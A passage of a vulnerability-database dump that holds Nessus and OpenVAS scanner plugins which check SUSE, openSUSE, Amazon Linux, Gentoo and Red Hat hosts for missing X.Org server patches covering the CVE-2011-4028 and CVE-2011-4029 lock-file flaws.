audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 
get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:08:21", "description": "The X server had two security issues and one bug that is fixed by this\nupdate.\n\nCVE-2011-4028: It is possible for a local attacker to deduce if a file\nexists or not by exploiting the way that Xorg creates its lock files.\n\nCVE-2011-4029: It is possible for a non-root local user to set the\nread permission for all users on any file or directory.", "edition": 24, "published": 
"2014-06-13T00:00:00", "title": "openSUSE Security Update : xorg-x11-Xvnc (openSUSE-SU-2012:0227-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xorg-x11-server", "p-cpe:/a:novell:opensuse:xorg-x11-server-sdk", "p-cpe:/a:novell:opensuse:xorg-x11-server-extra", "p-cpe:/a:novell:opensuse:xorg-x11-Xvnc", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_XORG-X11-XVNC-111201.NASL", "href": "https://www.tenable.com/plugins/nessus/75780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update xorg-x11-Xvnc-5490.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75780);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"openSUSE Security Update : xorg-x11-Xvnc (openSUSE-SU-2012:0227-1)\");\n script_summary(english:\"Check for the xorg-x11-Xvnc-5490 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The X server had two security issues and one bug that is fixed by this\nupdate.\n\nCVE-2011-4028: It is possible for a local attacker to deduce if a file\nexists or not by exploiting the way that Xorg creates its lock files.\n\nCVE-2011-4029: It is possible for a non-root local user to set the\nread permission for all users on any file or directory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-Xvnc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-Xvnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-Xvnc-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-extra-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-sdk-7.5_1.8.0-10.15.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T01:19:53", "description": "A flaw was found in the way the X.Org server handled lock files. 
A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)", "edition": 24, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : xorg-x11-server (ALAS-2012-104)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:xorg-x11-server-source", "p-cpe:/a:amazon:linux:xorg-x11-server-common", "p-cpe:/a:amazon:linux:xorg-x11-server-Xvfb", "p-cpe:/a:amazon:linux:xorg-x11-server-Xnest", "p-cpe:/a:amazon:linux:xorg-x11-server-debuginfo", "p-cpe:/a:amazon:linux:xorg-x11-server-Xephyr", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-104.NASL", "href": "https://www.tenable.com/plugins/nessus/69594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-104.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69594);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"ALAS\", value:\"2012-104\");\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"Amazon Linux AMI : xorg-x11-server (ALAS-2012-104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was 
found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-104.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update xorg-x11-server' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xnest-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-common-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-source-1.10.6-1.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xephyr / xorg-x11-server-Xnest / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T14:42:03", "description": "This update of xorg-x11-server-rdp fixed the following security \nissues :\n\n - 
memory exhaustion flaw CVE-2011-4028 / CVE-2011-4029 -\n race condition flaw. (CVE-2010-2240)", "edition": 17, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 / 11.2 Security Update : xorg-x11-server-rdp (SAT Patch Numbers 6111 / 6113)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029", "CVE-2010-2240"], "modified": "2013-01-25T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xorg-x11-server-rdp"], "id": "SUSE_11_XORG-X11-SERVER-RDP-120410.NASL", "href": "https://www.tenable.com/plugins/nessus/64240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64240);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-2240\", \"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"SuSE 11.1 / 11.2 Security Update : xorg-x11-server-rdp (SAT Patch Numbers 6111 / 6113)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of xorg-x11-server-rdp fixed the following security \nissues :\n\n - memory exhaustion flaw CVE-2011-4028 / CVE-2011-4029 -\n race condition flaw. 
(CVE-2010-2240)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=497578\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4029.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 6111 / 6113 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server-rdp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif 
(!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.11.10.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.11.10.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:51:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-19.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70782", "href": "http://plugins.openvas.org/nasl.php?oid=70782", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-19 (xorg-server)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in the X.Org X server might allow local\n attackers to disclose information.\";\ntag_solution = \"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n \n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-19\nhttp://bugs.gentoo.org/show_bug.cgi?id=387069\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-19.\";\n\n \n \nif(description)\n{\n script_id(70782);\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n 
script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-19 (xorg-server)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"x11-base/xorg-server\", unaffected: make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable: make_list(\"lt 1.10.4-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-03-17T23:03:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120267", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-104)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you 
can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120267\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:58 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-104)\");\n script_tag(name:\"insight\", value:\"A flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack. (CVE-2011-4028 )A race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information. 
(CVE-2011-4029 )\");\n script_tag(name:\"solution\", value:\"Run yum update xorg-x11-server to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-104.html\");\n script_cve_id(\"CVE-2011-4029\", \"CVE-2011-4028\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n 
exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2012-06-22T00:00:00", "id": "OPENVAS:1361412562310870775", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870775", "type": "openvas", "title": "RedHat Update for xorg-x11-server RHSA-2012:0939-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for xorg-x11-server RHSA-2012:0939-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-June/msg00036.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870775\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:26:29 +0530 (Fri, 22 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"RHSA\", value:\"2012:0939-04\");\n script_name(\"RedHat Update for xorg-x11-server RHSA-2012:0939-04\");\n\n 